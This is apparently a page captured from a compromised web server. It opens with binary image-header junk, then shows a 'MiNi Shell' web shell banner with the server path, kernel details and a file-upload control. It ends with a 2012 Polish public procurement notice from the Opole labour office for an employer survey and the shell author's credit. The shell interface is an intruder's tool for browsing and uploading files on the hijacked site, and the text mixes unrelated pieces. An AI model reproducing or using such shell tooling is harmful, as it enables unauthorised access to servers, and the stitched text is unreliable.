JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120823/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120823/311676-N-2012.html

<p class="kh_header"><b>Opole: Realizacja badania pn. Badanie optymizmu pracodawców województwa opolskiego</b><br>
<b>Numer ogłoszenia: 311676 - 2012; data zamieszczenia: 23.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Urząd Pracy w Opolu , ul. Głogowska 25C, 45-315 Opole, woj. opolskie, tel. 0-77 4416701, faks 0-77 4416702.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.wup.opole.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja badania pn. Badanie optymizmu pracodawców województwa opolskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Realizacja dwumodułowego badania wśród podmiotów gospodarczych działających na obszarze województwa opolskiego. Moduł pierwszy należy przeprowadzić z wykorzystaniem podejścia jakościowego, moduł drugi z wykorzystaniem podejścia ilościowego. 2.Zamawiający zastrzega sobie prawo uczestnictwa w konceptualizacji i operacjonalizacji w trakcie przygotowania do badań jakościowych oraz ilościowych, a także formułowania wytycznych w aspekcie analizy uzyskanego materiału empirycznego.3.Wykonawca zobowiązany jest do wykorzystania wiedzy Zamawiającego (w tym z zakresu metodologii), którą ten wyniósł z wizyty studyjnej w instytucjach Szwedzkich Publicznych Służb Zatrudnienia (Arbetfsörmedlingen).4.Zamawiający nie dopuszcza jakiejkolwiek pomocy ze swojej strony w uzyskaniu operatu badania jakościowego oraz ilościowego ani w dotarciu do respondentów wymienionych badań. 
5.Celem pierwszego modułu badania jest:1)określenie kryteriów niezbędnych dla ogólnego sposobu postrzegania działalności powiatowych urzędów pracy przez pracodawców;2)określenie kryteriów niezbędnych dla oceny działalności powiatowych urzędów pracy przez pracodawców w aspekcie wzajemnej współpracy;3)sposób postrzegania przez pracodawców działalności powiatowych urzędów pracy; 4)ocena dotychczasowej współpracy pracodawców z powiatowymi urzędami pracy;5)określenie oczekiwań w zakresie przyszłej współpracy.6.Założenia metodologiczne realizacji pierwszego modułu badania (badanie jakościowe):
1)Badanie należy przeprowadzić w postaci zogniskowanych wywiadów grupowych na terenie województwa opolskiego (FGI) z przedstawicielami firm, które 
w ostatnich 6 miesiącach skorzystały z usług powiatowego urzędu pracy lub nawiązały z nim kontakt.2)Zakłada się realizację czterech zogniskowanych wywiadów grupowych wśród firm z klas wielkości zatrudnienia:a)od 0 do 9 pracowników;b)od 10 do 49 pracowników;c)od 50 do 249 pracowników;
d)250 i więcej pracowników.3)Każdy z uczestników badania powinien reprezentować inną sekcję PKD działalności gospodarczej, a liczba uczestników każdej grupy powinna zawierać się pomiędzy 6 a 8 osób.4)Uczestnicy reprezentować powinni  firmy zlokalizowane w miastach powiatowych województwa opolskiego, przy czym wyklucza się możliwość uczestnictwa więcej niż jednej firmy z danego miasta. 5)W przypadku wywiadu z respondentami pochodzącymi z klasy wielkości 0-9 pracowników, połowę uczestników powinni stanowić przedstawiciele jednoosobowych działalności gospodarczych. 6)	Zamawiający dopuszcza realizację badań z pominięciem rejestracji video i jednocześnie zastrzega sobie prawo uczestnictwa w realizacji wybranych zogniskowanych wywiadach grupowych.
7.Przed przystąpieniem do realizacji zogniskowanych wywiadów grupowych Wykonawca zobligowany jest do przedstawienia Zamawiającemu:a)scenariusza wywiadu grupowego wraz z opisem technik przewidzianych w trakcie realizacji;
b)listy firm biorących udział w badaniach wraz z ich charakterystyką. 8.Zamawiający w terminie 3 dni roboczych zaakceptuje przekazany scenariusz wywiadu oraz listę firm lub zgłosi swoje uwagi. Wykonawca zobowiązany jest uwzględnić uwagi Zamawiającego w terminie 3 dni roboczych od daty ich przesłania.
9.Po zakończeniu modułu jakościowego Wykonawca sporządzi raport zawierający odpowiedzi na problemy badawcze zawarte w punkcie 5 i prześle go Zamawiającemu w postaci elektronicznej (MS Word oraz Adobe Acrobat).  Wykonawca w terminie 5 dni roboczych zaakceptuje przekazany raport lub zgłosi swoje uwagi. Wykonawca zobowiązany jest uwzględnić uwagi Zamawiającego w terminie 3 dni roboczych od daty ich przesłania.10.Celem drugiego modułu badania (ilościowego) jest:1)poznanie sposobu postrzegania działalności powiatowych urzędów pracy przez pracodawców oraz ocena współpracy firm z powiatowymi urzędami pracy;2)rozpoznanie czynników kształtujących sposób postrzegania działalności PUP oraz ocena współpracy przedsiębiorców z PUP;3)rozpoznanie stopnia znajomości oferty powiatowych urzędów pracy skierowanych do pracodawców oraz ocenę ich przydatności;4)uzyskanie informacji na temat prognozy zatrudnienia w perspektywie kwartalnej, półrocznej oraz rocznej;
5)określenie preferencji przyszłych pracowników pod względem cech społeczno-demograficznych oraz posiadanych kwalifikacji (np. poziom wykształcenia, kierunek wykształcenia, posiadany zawód). 11.W trakcie realizacji drugiego modułu badania (badanie ilościowe) Wykonawca ma obowiązek wykorzystać informacje pochodzące z modułu pierwszego (badanie jakościowe).12.Ocenę współpracy firm z powiatowymi urzędami pracy należy sporządzić w taki sposób, aby pracodawca z danego obszaru terytorialnego (powiat) oceniał właściwy mu powiatowy urząd pracy lub ten, z którym najczęściej współpracuje, lecz nie oba jednocześnie.
13.Założenia metodologiczne realizacji drugiego modułu badania (badanie ilościowe):
1)Badanie należy przeprowadzić wśród losowo dobranych przedsiębiorców. Operat losowania próby badawczej stanowi populacja firm zarejestrowanych w bazie REGON (prowadzonej przez Główny Urząd Statystyczny po aktualizacji w roku 2011) w województwie opolskim;2)Losowanie należy przeprowadzić w sposób warstwowy, uwzględniając klasę wielkości zatrudnienia (pierwsza warstwa), przestrzenny rozkład podmiotów gospodarczych w poszczególnych powiatach województwa opolskiego (druga warstwa) oraz sekcję PKD prowadzonej działalności (trzecia warstwa);3)Wielkość próby musi umożliwić uogólnianie wniosków w stosunku do ogółu firm prowadzących działalność w województwie opolskim w poszczególnych klasach wielkości zatrudnienia: a)od 0 do 9 pracowników;
b)od 10 do 49 pracowników;c)od 50 do 249 pracowników;d)250 i więcej pracowników,przy akceptowalnym błędzie  nie większym niż +/-5% i przedziale ufności 95% i nie być mniejsza niż 1100 podmiotów gospodarczych łącznie; 
4)Odsetek użytecznych kwestionariuszy wypełnionych w trakcie badania nie może być niższy niż 95% i jednocześnie nie może wpłynąć na zmianę akceptowalnych kryteriów wnioskowania określonych przy procedurze doboru próby badawczej;
5)Przez określenie użyteczny kwestionariusz badania rozumieć należy kwestionariusz badania, w którym odsetek braku odpowiedzi na każde zadane pytanie badawcze (zmienną) nie będzie większy niż 5%;6)Spośród dostępnych technik dotarcia do respondentów Zamawiający dopuszcza stosowanie jednej lub kilku wybranych spośród następujących:a)wywiad bezpośredni (PAPI), b)wywiad telefoniczny (CATI) oraz c)wywiad za pośrednictwem Internetu (CAWI).
7)Wykonawca zobligowany jest do przeprowadzenia badania z przedstawicielami podmiotów piastującymi stanowiska związane z polityką personalną danego podmiotu gospodarczego; 8)Wykonawca jest zobowiązany do informowania respondentów o tym, iż uczestniczą w badaniu realizowanym w ramach Programu Operacyjnego Kapitał Ludzki, a tym samym współfinansowanym przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.14.Po wylosowaniu próby badawczej, a przed przystąpieniem do zbierania danych Wykonawca zobowiązany jest do przekazania Zamawiającemu bazy podmiotów gospodarczych biorących udział w badaniu wraz z danymi teleadresowymi oraz informacjami pozwalającymi na identyfikację warstw stanowiących podstawę do losowania. Bazę danych Wykonawca dostarczy zamawiającemu w postaci elektronicznej w formacie MS Excel. Niedopuszczalne jest blokowanie plików hasłem lub innymi blokadami uniemożliwiającymi ich modyfikację i wydruk. Zamawiający w terminie 3 dni roboczych zaakceptuje listę firm lub zgłosi swoje uwagi. Wykonawca zobowiązany jest uwzględnić uwagi Zamawiającego w terminie 3 dni roboczych od daty ich przesłania;15.Po zaakceptowaniu listy firm biorących udział w badaniu Wykonawca przedstawi projekt kwestionariusza ankiety w postaci elektronicznej w formacie MS Word, którym będzie posługiwać się w trakcie zbierania danych empirycznych. Kwestionariusz powinien powstać m.in. na podstawie wiedzy uzyskanej z realizacji modułu jakościowego. Niedopuszczalne jest blokowanie plików hasłem lub innymi blokadami uniemożliwiającymi ich modyfikację i wydruk. Zamawiający w terminie 5 dni roboczych zaakceptuje projekt kwestionariusza lub zgłosi swoje uwagi. Wykonawca zobowiązany jest uwzględnić uwagi Zamawiającego w terminie 3 dni roboczych od daty ich przesłania;16.Wykonawca zobligowany jest do przekazania zakodowanych informacji pochodzących z realizacji badania ilościowego w postaci bazy danych zapisanej na płytę CD w formacie obsługiwanym przez program IBM SPSS Statistics 20 (np. .sav; .dbf.; lub .xls). 1)Baza danych powinna być opisana w sposób umożliwiający jasną interpretację treści zakodowanych danych;
2)Baza danych powinna zawierać, oprócz danych podstawowych uzyskanych 
w trakcie gromadzenia danych, opisane nowoutworzone zmienne wykorzystywane w trakcie analizy statystycznej.Niedopuszczalne jest blokowanie plików hasłem lub innymi blokadami uniemożliwiającymi ich modyfikację i wydruk.17.Wykonawca zobligowany jest do utworzenia teleadresowej bazy danych firm, które wzięły udział w badaniu odpowiadając na pytania zawarte w kwestionariuszu ankiety. Bazę danych Wykonawca prześle Zamawiającemu do 3 dni roboczych po zakończeniu zbierania danych empirycznych, a posłuży ona Zamawiającemu do przeprowadzenia kontroli rzetelności wykonania usługi.18.W ramach powierzonej usługi, na podstawie wiedzy pochodzącej z obu modułów badania Wykonawca w oparciu o dane z badania ilościowego sporządzi dwa syntetyczne wskaźniki. Pierwszy określać będzie sposób postrzegania powiatowych urzędów pracy przez pracodawców. Drugi będzie oceniać współpracę przedsiębiorców z powiatowymi urzędami pracy. Oba wskaźniki charakteryzować się powinny zadowalającym, ze statystycznego punktu widzenia, stopniem rzetelności.  19.Po zakończeniu drugiego modułu badania Wykonawca sporządzi dwa raporty i przekaże Zamawiającemu w postaci elektronicznej nagrane na płytę CD w formacie (MS Word oraz Adobe Acrobat). Raport pierwszy (metodologiczny) zawierać będzie:a)szczegółowy opis zastosowanej metodologii w trakcie realizacji obu modułów badania;b)szczegółową informację o zasadach na jakiej zostały skonstruowane syntetyczne wskaźniki ujęte w punkcie 18; 
c)Załączniki w postaci narzędzi badawczych (scenariusza wywiadu w przypadku badań jakościowych oraz kwestionariusz ankiety w przypadku badania ilościowego). 
Niedopuszczalne jest blokowanie plików hasłem lub innymi blokadami uniemożliwiającymi ich modyfikację i wydruk.20.	Raport drugi o długości maksymalnie 50 stron w szczególności zawierać będzie:a)wnioski i rekomendacje znajdujące się na jego początku;b)wstęp metodologiczny o długości maksymalnie 2 stron zawierający cel badania oraz metody jego realizacji; c)opis podjętych problemów badawczych z badania ilościowego.Wyniki prac analitycznych prezentowane w raporcie drugim oprócz tekstu zawierać będą zestawienia graficzne w postaci tabel, wykresów oraz map, w odniesieniu do prezentacji wartości wskaźników ujętych w punkcie 18. Niedopuszczalne jest blokowanie plików hasłem lub innymi blokadami uniemożliwiającymi ich modyfikację i wydruk.21.W ramach powierzonej usługi, Wykonawca sporządzi projekt plakatu informacyjnego zawierającego mapę obrazującą przestrzenny rozkład wartości wskaźników ujętych w punkcie 18 w formie pliku PDF przygotowanego do wydruku w drukarni. Wykonawca przedstawi projekty raportów ujętych w punkcie 19-20 oraz plakatu informacyjnego Zamawiającemu, a ten w terminie 5 dni roboczych zaakceptuje je lub zgłosi swoje uwagi. Wykonawca zobowiązany jest uwzględnić uwagi Zamawiającego w terminie 5 dni roboczych od daty ich przesłania;22.Wykonawca oddeleguje co najmniej jednego członka zespołu realizującego usługę badawczą, posiadającego wysoką kulturę osobistą w charakterze prelegenta na konferencję podsumowującą organizowaną przez Zamawiającego, która odbędzie się w Opolu w okresie IV kwartału 2013 roku.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 73.11.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.03.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania tego warunku zamawiający wymaga przedłożenia oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych. Ocena spełniania tego warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie przedłożonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania tego warunku zamawiający wymaga przedłożenia oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych oraz wykazu wykonanych co najmniej trzech usług badawczych dla administracji publicznej, w których próbą badawczą były podmioty gospodarcze, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie, sporządzonego według wzoru stanowiącego Załącznik nr 3 do SIWZ. Ocena spełniania tego warunku zostanie dokonana według formuły spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania tego warunku zamawiający wymaga przedłożenia oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych. Ocena spełniania tego warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie przedłożonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania tego warunku zamawiający wymaga przedłożenia oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych oraz wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, z których co najmniej 1 (jeden) członek wchodzący w skład zespołu badawczego, posiada tytuł naukowy doktora nauk społecznych lub ekonomicznych, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia 
i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami, sporządzony według wzoru stanowiącego Załącznik nr 4 do SIWZ. Ocena spełniania tego warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie przedłożonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania tego warunku zamawiający wymaga przedłożenia oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych. Ocena spełniania tego warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie przedłożonych dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.wup.opole.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Urząd Pracy w Opolu, ul. Głogowska 25 c, Opole.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.09.2012 godzina 10:00, miejsce: Wojewódzki Urząd Pracy w Opolu, ul. Głogowska 25 c - KANCELARIA pok. nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Opolskie Oberwatorium Rynku Pracy/Program Operacyjny Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com